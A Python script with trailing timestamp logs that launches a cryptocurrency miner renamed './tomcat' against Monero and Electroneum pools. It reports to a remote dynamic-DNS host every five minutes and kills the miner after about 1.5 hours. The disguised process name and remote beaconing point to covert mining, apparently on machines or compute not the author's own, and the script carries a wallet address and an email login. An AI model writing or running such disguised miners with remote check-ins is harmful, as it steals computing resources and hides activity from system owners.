import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:04.007735
#2018-02-17 17:26:08.242194
#2018-02-17 19:15:04.252363
#2018-02-17 21:03:05.836539
#2018-02-17 22:48:01.429602
#2018-02-18 00:32:07.708262
#2018-02-18 02:22:05.461769
#2018-02-18 04:10:01.288996
#2018-02-18 06:01:01.776405
#2018-02-18 07:51:01.884437
#2018-02-18 09:38:05.224217
#2018-02-18 11:23:05.093239
#2018-02-18 13:09:03.684841
#2018-02-18 14:58:01.993369
#2018-02-18 16:47:05.505467
#2018-02-18 18:35:05.262158
#2018-02-18 20:23:03.697134
#2018-02-18 22:09:02.154283
#2018-02-18 23:57:01.595993
#2018-02-19 01:43:01.251812
#2018-02-19 03:31:05.743462
#2018-02-19 05:16:08.211742
#2018-02-19 07:02:07.198606
#2018-02-19 08:51:05.886092
#2018-02-19 10:40:09.008916
#2018-02-19 12:28:06.831687
#2018-02-19 14:16:06.496374
#2018-02-19 16:05:07.418563
#2018-02-19 17:52:04.266056
#2018-02-19 19:38:05.576259
#2018-02-19 21:27:06.784180
#2018-02-19 23:13:02.224837
#2018-02-20 00:58:04.595460
#2018-02-20 02:48:04.264825
#2018-02-20 04:37:01.814479
#2018-02-20 06:20:09.452959
#2018-02-20 08:05:03.970451
#2018-02-20 09:50:08.375850
#2018-02-20 11:34:06.087060
#2018-02-20 13:22:07.324738
#2018-02-20 15:08:06.786553
#2018-02-20 16:52:04.166388
#2018-02-20 18:39:08.305512
#2018-02-20 20:31:06.165054
#2018-02-20 22:17:07.039647
#2018-02-20 23:59:07.196183
#2018-02-21 01:43:05.451463
#2018-02-21 03:31:07.140957
#2018-02-21 05:19:06.518719
#2018-02-21 07:07:04.538294
#2018-02-21 08:53:04.494562
#2018-02-21 10:40:02.508098
#2018-02-21 12:28:09.817612
#2018-02-21 14:16:01.410538
#2018-02-21 16:02:09.556014
#2018-02-21 17:54:06.195818
#2018-02-21 19:41:07.456280
#2018-02-21 21:28:01.906987
#2018-02-21 23:14:04.394994
#2018-02-22 01:05:03.967568
#2018-02-22 02:52:06.250061
#2018-02-22 04:40:03.245015
#2018-02-22 06:24:07.545411
#2018-02-22 08:12:01.394223
#2018-02-22 09:59:05.183649
#2018-02-22 11:44:01.872245
#2018-02-22 13:29:01.989051
#2018-02-22 15:17:01.968175
#2018-02-22 17:02:01.474793
#2018-02-22 18:48:06.646425
#2018-02-22 20:41:05.947023
#2018-02-22 22:28:05.317493
#2018-02-23 00:13:01.667095
#2018-02-23 02:00:07.033786
#2018-02-23 03:47:07.235953
#2018-02-23 05:35:06.801478
#2018-02-23 07:20:09.417071
#2018-02-23 09:24:05.781773
#2018-02-23 11:29:04.261765
#2018-02-23 13:19:07.742896
#2018-02-23 15:04:03.623717
#2018-02-23 16:53:08.453709
#2018-02-23 18:39:03.685938
#2018-02-23 20:25:04.287222
#2018-02-23 22:12:03.762605
#2018-02-23 23:59:02.227846
#2018-02-24 01:49:02.042687
#2018-02-24 03:42:04.659845
#2018-02-24 05:26:07.351042
#2018-02-24 07:13:07.389993
#2018-02-24 09:03:05.210731
#2018-02-24 10:59:05.982090
#2018-02-24 12:48:05.468639
#2018-02-24 14:37:06.713282
#2018-02-24 16:24:05.862487
#2018-02-24 18:17:06.222396
#2018-02-24 20:04:04.968135
#2018-02-24 21:47:04.315637
#2018-02-25 00:47:07.973987
#2018-02-25 03:49:06.104658
#2018-02-25 06:36:02.029715
#2018-02-25 11:36:02.202340
#2018-02-25 13:22:01.241745
#2018-02-25 14:55:01.474970